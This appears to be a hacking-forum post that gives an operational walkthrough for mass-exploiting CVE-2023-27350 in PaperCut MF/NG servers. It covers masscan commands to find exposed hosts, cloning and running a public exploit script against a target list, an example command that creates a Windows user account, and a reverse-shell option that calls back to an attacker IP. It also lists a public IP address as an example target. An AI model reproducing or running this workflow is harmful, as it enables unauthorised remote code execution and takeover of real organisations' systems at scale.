CVE-2023-27350 Exploit POC
masscan ip (thank to Prokhorenco for examples)
ports are from shodan
Код:
sudo masscan -Pn -sS -iL ipcontry.txt --rate 6000 -p9191,443,80,9001,9000,9192,8080,311,444,1337,1926,2083,2376,3780,3790,4433,4443,5986,6443,7071,7443,7548,8009,8081,8089,8090,8139,8140,8181,8443,8880,8889,9002,9091,9443,9943,10000,10250,10443,16993,31337,55443,55553 --open-only --excludefile block.txt --output-format list --output-file file.txt
Код:
wget https://gist.githubusercontent.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2/raw/a4fa934311b8b9ed11fa6136d05565356601e991/blacklist.dat
Код:
cp blacklist.dat block.txt
Код:
mv blacklist.dat block.txt
Код:
git clone https://github.com/adhikara13/CVE-2023-27350.git
Код:
pip install -r requirements.txt
Код:
python3 CVE-2023-27350.py -f file.txt
Options
- -u, --url: The URL of the target PaperCut MF/NG application (e.g., http://target-ip:9191).
- -c, --command: The command to execute on the target system.
- --reverse-shell: Use a reverse shell payload to execute commands on the target system.
- -f, --file: Check multiple targets from a file (e.g., file.txt).
Example
Execute Command
To execute a command on the target system, use the -c option:python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
Reverse Shell
To use a reverse shell payload to execute commands on the target system, use the --reverse-shell option. You will be prompted to enter your IP address and port number:python exploit.py -u http://target-ip:9191 --reverse-shell
Enter your IP address: <attacker-ip>
Enter your port number: <port>
Mass Checking
To check multiple targets from a file, use the -f option. The format of the file should be ip_address:port:python CVE-2023-27350.py -f file.txt
Formatting the file.txt
When using the mass checking option with the file.txt input, make sure that the contents of the file are formatted correctly.Each line of the file should contain the IP address and port number of a target, separated by a colon :. For example:
110.175.19.78:9191
110.175.19.78:80
192.168.1.1:8080
Вложения
Последнее редактирование: